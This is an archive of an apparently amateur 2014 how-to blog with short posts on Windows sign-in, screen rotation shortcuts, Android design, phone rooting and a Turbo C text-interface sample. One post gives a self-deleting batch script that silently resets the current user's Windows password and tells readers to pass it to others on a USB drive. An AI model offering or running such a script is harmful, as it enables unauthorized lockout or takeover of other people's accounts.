Tuesday, 15 April 2014

How to singn in with windows 8

Signing in with a Microsoft account



STEP:1 Connect to an existing Microsoft account

Even if you’re not signed in to your PC with a Microsoft account, you might already have one if you use other Microsoft services like Xbox, Hotmail, Outlook.com, or Skype. Your Microsoft account is the email address you use to sign in to those services.
Enter the email address and password you use to sign in to other Microsoft services, tap or click Next, and follow the instructions.


STEP:2 Sign up with the email address you use most often

If you haven’t used Microsoft services in the past, you can use any email address you want to sign up for a new Microsoft account, including addresses from Outlook.com, Yahoo! or Gmail. To use your favorite email address:
  1. Enter the email address you want to use, and then tap or click Create a new account.
  2. Follow the instructions to fill out your personal and security info, and you're all set.



STEP:3  Get a new email address

If you want to start fresh and get a brand-new email address to use as your Microsoft account, you can get one for free:
  1. Tap or click Create a new account.
  2. Follow the instructions to fill out your personal and security info for a new email address, and you're ready to go.


How to rotate screen in windows xp using keyboard shortcut

This post will teach you how to rotate your desktop screen just by Keyboard in windows XP  .What you have to do is just press a collection of keys on your keyboard.

STEP 1:press CTRL+ALT+UP ARROW

STEP 2:press CTRL+ALT+DOWNARROW


STEP 3:press CTRL+ALT+RIGHT ARROW


STEP 4:press CTRL+ALT+LEFT ARROW

HOW to make android app designs

When a android app is u8nderdevelopment it is first necessity to iknow that how it looks.So Design i utmost important Part and you can earn a lot from it all you need is creativity and an earned software like photoshop.


Step 1: Decide your design using a rough sketch.



Step 3: Research the design aspects on internet to take a rough idea .

Step 4: Divide your design in layers in photoshop and do not forget to use opacity.

Wednesday, 19 March 2014

How to Alter admin password in windows

You can do a lot of hacks using batch programming.Just what you have to know is a code snippet for notepad that will be saved as batch file that is .bat extension.







Step 1: Open Notepad

Step 2 : Write the following code in notepad

@echo off
NET USER %username% howquest
DEL pwd.bat

Step 3: Save the file with any name but with .bat extension 

Step 4: The file is ready to use just you have to copy the file in a USB drive when it is plugged in and file is executed by user password will be automatically change.

Tuesday, 18 March 2014

How to Modify your Old Cell Phone


When you have used your too much and you are stuck with it and its out of guarantee ,What you can do its modify it to get its root access through following steps.





  • Greater Power ,Greater Responsibilty

Through rooting you can get admin access to your PHONE that's what called supersuer that's installed when you root your phone


  • Root your phone through following given steps and verified practically 

how-to-flash-your-android-phone-with-custom-rom


  • Backup your phone

Use CWM to backup your phones everything including ROM. Isn't that interesting


  • Root Your Phone

Visit our POST How to root Android
Visit XDA developers to see the list of rootable phones and tutorials on how to root.


Sunday, 16 March 2014

How to BUILD text based Interactive Interface in C/C++

Why to use graphics when colored text can do the same thing.So here is a sample code in C/C++
to build a colorful text based UI for your project.



#include<iostream.h>
#include<fstream.h>
#include<conio.h>
#include<stdlib.h>
#include<ctype.h>
#include<stdio.h>
#include<string.h>

void main()
{

clrscr();
textcolor(14);
gotoxy(35,3);
cprintf("COMPILER - PASS 1");
gotoxy(37,6);
textcolor(4);
cprintf("INSTRUCTION !!");
textcolor(14);
gotoxy(37,7);
cprintf("--------------");
textcolor(14);
gotoxy(18,8);
int i=0;
//upper horzontal
for(i=0;i<50;i++)
{
cprintf("|");
}
int j,k;
//right vertical
for(j=0;j<10;j++)
  {
    gotoxy(68,8+j);
  cprintf("||");

  }
//bootom horizontal
gotoxy(18,18);
for(i=0;i<52;i++)
{
cprintf("|");
}
  j=0;
  for(j=0;j<10;j++)
  {
    gotoxy(18,8+j);
  cprintf("||");

  }
  gotoxy(22,10);
  textcolor(4);
  cprintf("HOWQUEST ");
     gotoxy(22,20);
     textcolor(14+128);
cprintf("-->");
  textcolor(4);
cprintf("Press Enter To Proceed");
 gotoxy(22,22);
     textcolor(14+128);
cprintf("-->");
  textcolor(4);
cprintf("Press E To Exit");

getch();

}

OUTPUT:




  • Graphics vary here.
  • Run the code then analyse


Copyright @ 2013 HowQuest.

Join me on Facebook Follow me on Twitter Subscribe to RSS Email me Give it a title